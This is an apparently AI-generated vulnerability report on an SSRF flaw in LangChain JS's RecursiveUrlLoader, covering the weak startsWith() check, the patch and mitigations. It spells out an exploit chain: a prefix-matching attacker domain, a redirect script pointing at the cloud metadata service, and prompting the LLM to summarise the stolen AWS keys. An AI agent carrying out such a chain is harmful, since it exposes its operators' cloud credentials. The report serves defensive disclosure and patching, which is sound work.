CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26019
CVSS 4.1

Spider in the Web: Escaping LangChain's Crawler Sandbox via SSRF

Alon Barad
Software Engineer

Feb 12, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

The RecursiveUrlLoader in LangChain JS used `startsWith()` to validate URLs, allowing attackers to bypass domain restrictions and scan internal networks or steal cloud credentials.

A logic flaw in the LangChain JS `@langchain/community` package allows for Server-Side Request Forgery (SSRF) within the `RecursiveUrlLoader`. By bypassing a weak string-prefix validation check, attackers can force the crawler to access internal network resources, local loopback interfaces, or cloud metadata services. Since the output of this loader is typically fed into an LLM for summarization or processing, this vulnerability transforms a simple network scan into a high-fidelity data exfiltration pipeline.

The Hook: Feeding the Beast

In the modern AI ecosystem, data is oxygen. We build agents, give them tools, and tell them to "go forth and learn." One of the most popular tools in the LangChain arsenal is the RecursiveUrlLoader. It's essentially a web spider in a box—you point it at a documentation site or a wiki, and it recursively scrapes every link it finds to build a knowledge base for your RAG (Retrieval-Augmented Generation) pipeline.

But here's the thing about giving a robot a web browser: unless you put a leash on it, it's going to wander into your backyard. The developers knew this. They implemented a preventOutside flag, enabled by default, intended to keep the spider inside the garden fence (the target domain). Ideally, if you point it at https://docs.example.com, it shouldn't wander off to https://pornhub.com or, more importantly, http://169.254.169.254 (the AWS metadata service).

CVE-2026-26019 is the story of how that leash was made of wet paper. It turns out that validating URLs is hard, and using string manipulation to do it is almost always a death sentence for security.

The Flaw: The 'startsWith' Fallacy

The root cause of this vulnerability is a classic developer mistake: confusing a string prefix with a security boundary. To enforce the preventOutside rule, the code needed to check if a discovered link belonged to the same origin as the base URL.

Instead of parsing the URL into its component parts (protocol, hostname, port) and comparing them semantically, the code did this:

// The 'Security' Check
const isAllowed = !this.preventOutside || link.startsWith(baseUrl);

If you are a security researcher, you are likely grinning right now. If you are a developer, let me explain why this is catastrophic. In the world of URLs, startsWith is meaningless for origin validation. If my baseUrl is https://example.com, obviously https://example.com/page2 passes. But so does https://example.com.attacker.com.

This is the "Golden Key" bypass. By simply registering a domain that starts with the target string, or utilizing certain URL formatting tricks (like the @ symbol for authentication segments), an attacker can fool the crawler into thinking an external, malicious, or internal IP is actually part of the allowed zone.
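A quick REPL-style check makes the fallacy concrete (the domain names here are illustrative):

```typescript
// Demonstration: why startsWith() is not an origin check.
const baseUrl = "https://example.com";

// Legitimate same-origin link — passes, as expected.
console.log("https://example.com/page2".startsWith(baseUrl)); // true

// Attacker-registered domain — also passes the "check".
console.log("https://example.com.attacker.com/payload".startsWith(baseUrl)); // true

// A real origin comparison using the WHATWG URL parser rejects it,
// because the parsed hostnames differ.
const sameOrigin = (a: string, b: string) =>
  new URL(a).origin === new URL(b).origin;
console.log(sameOrigin("https://example.com.attacker.com/payload", baseUrl)); // false
```

The parser-based comparison is one line longer than the string check, which is exactly why the shortcut is so tempting.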

The Code: From Negligence to Sanity

Let's look at the smoking gun. The vulnerability existed in RecursiveUrlLoader prior to version 1.1.14. The fix involved ripping out the naive string comparison and replacing it with a dedicated SSRF protection module that actually understands what a URL is.

The Vulnerable Code:

// recursive_url.ts (Pre-patch)
// 🚩 Narrative: "Looks like the base URL? Must be safe!"
if (this.preventOutside && !link.startsWith(this.url)) {
  continue;
}

The Patched Code:

// recursive_url.ts (Patched)
// 🛡️ Narrative: "Check origin, check IP, check everything."
import { isSameOrigin, validateSafeUrl } from "@langchain/core/utils/ssrf";
 
// ... inside the loop
if (this.preventOutside && !isSameOrigin(link, this.url)) {
  continue;
}
 
// The real MVP: Proactive IP validation before fetch
if (!(await validateSafeUrl(link))) {
  throw new Error("Potentially unsafe URL detected");
}

The patch introduced validateSafeUrl, which does the heavy lifting. It blocks Private IP ranges (RFC 1918), loopback addresses (127.0.0.1), and the notorious cloud metadata IP (169.254.169.254). It also handles the semantic origin check correctly, ensuring that example.com.evil.com is treated as a different origin than example.com.
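The library's actual implementation is not reproduced here, but a minimal sketch of the checks a guard like validateSafeUrl has to perform might look roughly like this (helper names and structure are illustrative, not the @langchain/core source):

```typescript
import { isIP } from "node:net";

// Hypothetical sketch of an SSRF guard — NOT the real LangChain code.
function isPrivateIPv4(host: string): boolean {
  if (isIP(host) !== 4) return false; // only literal IPv4 addresses here
  const [a, b] = host.split(".").map(Number);
  return (
    a === 10 ||                          // 10.0.0.0/8 (RFC 1918)
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12 (RFC 1918)
    (a === 192 && b === 168) ||          // 192.168.0.0/16 (RFC 1918)
    a === 127 ||                         // loopback
    (a === 169 && b === 254)             // link-local, incl. 169.254.169.254 (IMDS)
  );
}

function isSafeUrl(raw: string): boolean {
  let url: URL;
  try {
    url = new URL(raw); // unparseable input is rejected outright
  } catch {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  if (url.hostname === "localhost") return false;
  return !isPrivateIPv4(url.hostname);
}

console.log(isSafeUrl("http://169.254.169.254/latest/meta-data/")); // false
console.log(isSafeUrl("https://docs.example.com/intro"));           // true
```

Note the limitation of this sketch: it only inspects literal IPs, so a production guard must also resolve hostnames and re-check the resolved addresses, or an attacker can simply point a DNS record at 169.254.169.254.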

The Exploit: Exfiltrating Cloud Credentials

So, how do we weaponize this? We need two things: a way to feed the crawler a starting URL (or control a page it visits), and a target worth stealing. In a cloud environment, the target is almost always the Instance Metadata Service (IMDS).

The Setup:

  1. The victim is running a LangChain agent on AWS EC2/Lambda.
  2. The agent uses RecursiveUrlLoader to scrape a URL provided by the user (or a URL the attacker can modify).

The Attack Chain:

  1. Bypass the Scope: The attacker hosts a malicious page at https://target-site.com.attacker-controlled.net. If the user points the loader here, or if the loader crawls here from a valid site (via an open redirect or comment section), the startsWith check passes because the string matches the prefix.

  2. The Redirection (SSRF): On the attacker's page, we place a link or an HTTP redirect to http://169.254.169.254/latest/meta-data/iam/security-credentials/.

  3. The Exfiltration: This is where LangChain makes the vulnerability worse than a standard SSRF. A standard SSRF might just be "blind" (you can send requests but not see responses). But the entire purpose of this component is to read the response body and return it as text to the LLM.

  4. The Payday: The loader fetches the metadata, believing it to be just another web page. It passes the AWS keys to the LLM. The attacker then asks the LLM: "Summarize the documents you just crawled." The LLM happily replies: "I found some JSON data containing an AccessKeyId and a SecretAccessKey..."
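Step 2 of the chain requires nothing more than a trivial redirector on the attacker's host. A hypothetical Node.js sketch (port and paths are illustrative):

```typescript
import { createServer } from "node:http";

// Hypothetical attacker-side redirector for step 2 of the chain.
// Any crawler that follows redirects is steered into the IMDS endpoint.
const server = createServer((req, res) => {
  res.writeHead(302, {
    Location:
      "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
  });
  res.end();
});

server.listen(8080, () => {
  console.log("Redirector listening on http://localhost:8080");
});
```

Served behind a prefix-matching hostname like https://target-site.com.attacker-controlled.net, this single 302 turns the crawler's "fetch and read" loop into the exfiltration primitive described above.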

The Impact: Why This Matters

SSRF in AI agents is a distinct beast. In traditional web apps, SSRF is often used to port scan internal networks or hit legacy administrative interfaces. In AI, it is an Identity Theft vector.

Because the RecursiveUrlLoader is designed to ingest unstructured text, it bypasses many of the format-based protections that might stop other SSRF attacks (like expecting HTML). It will happily ingest JSON, XML, or raw text credentials.

If this runs in a cloud environment (AWS, GCP, Azure) without strict IMDSv2 token requirements, a single crawl can result in full account takeover. Furthermore, because the CVSS vector marks User Interaction as Required (someone has to tell the bot to crawl), the 4.1 score deceptively masks the critical nature of the flaw. If you are building a "Chat with Website" feature, this is a Critical vulnerability for your infrastructure.

Mitigation: Patching the Hole

The immediate fix is simple: Upgrade @langchain/community to version 1.1.14 or later. This pulls in the new SSRF protections.

However, code fixes are only one layer of defense. You should treat the environment your AI agents run in as hostile.

  1. Network Segmentation: Why does your AI scraping container need access to your internal HR portal or the AWS Metadata service? It doesn't. Use iptables or Security Groups to block egress traffic to 10.0.0.0/8, 192.168.0.0/16, and 169.254.169.254.
  2. Enforce IMDSv2: If you are on AWS, enforce IMDSv2 (session-oriented). It requires a PUT request with specific headers to obtain a token before metadata can be read. Simple GET-based SSRF (like this web crawler) cannot set those headers, effectively neutralizing the cloud credential theft vector.
  3. Input Validation: Never trust a URL provided by a user. Even with the patch, users might find ways to abuse the crawler to DDoS external sites. Rate-limit and allowlist domains wherever possible.
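A minimal allowlist gate in front of a "Chat with Website" crawler might look like this (the hostnames are placeholders, not part of the advisory):

```typescript
// Hypothetical allowlist gate — crawl requests are checked before
// they ever reach the loader. Hostnames below are examples only.
const ALLOWED_HOSTS = new Set(["docs.example.com", "wiki.example.com"]);

function isAllowlisted(raw: string): boolean {
  try {
    const { protocol, hostname } = new URL(raw);
    // Exact hostname membership — no prefix matching, no substrings.
    return protocol === "https:" && ALLOWED_HOSTS.has(hostname);
  } catch {
    return false; // unparseable input is never crawled
  }
}

console.log(isAllowlisted("https://docs.example.com/intro"));           // true
console.log(isAllowlisted("https://docs.example.com.attacker.net/x"));  // false
console.log(isAllowlisted("http://169.254.169.254/latest/meta-data/")); // false
```

Because membership is checked on the parsed hostname rather than the raw string, the prefix-matching trick that defeats startsWith() fails here by construction.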

Official Patches

LangChain: Pull Request implementing strict origin checks and IP validation


Technical Appendix

CVSS Score
4.1 / 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Affected Systems

@langchain/community < 1.1.14 (applications using RecursiveUrlLoader)

Affected Versions Detail

Product: @langchain/community (langchain-ai)
Affected Versions: < 1.1.14
Fixed Version: 1.1.14

CWE ID: CWE-918
Attack Vector: Network
CVSS Score: 4.1 (Medium)
Impact: Confidentiality (Low), Scope Changed
Vulnerable Logic: String.startsWith() bypass
Target Component: RecursiveUrlLoader

MITRE ATT&CK Mapping

T1190: Exploit Public-Facing Application (Initial Access)
T1552.005: Cloud Instance Metadata API (Credential Access)

CWE-918: Server-Side Request Forgery (SSRF)

Known Exploits & Detection

Hypothetical: Constructed scenario using a prefix-matching domain bypass to access the AWS metadata service.

Vulnerability Timeline

Vulnerability Published
2026-02-11
Patch Released in v1.1.14
2026-02-11

References & Sources

  • [1] GHSA-gf3v-fwqg-4vh7 Advisory
  • [2] OWASP SSRF Prevention Cheat Sheet

Attack Flow Diagram
